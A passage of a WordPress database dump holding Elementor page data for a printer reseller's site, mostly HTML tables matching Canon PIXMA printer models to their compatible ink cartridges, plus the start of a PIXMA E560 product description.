width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7101,3328,'_wp_page_template','template-fullwidth.php'),(7102,3328,'_elementor_edit_mode','builder'),(7103,3328,'_elementor_template_type','post'),(7104,3328,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 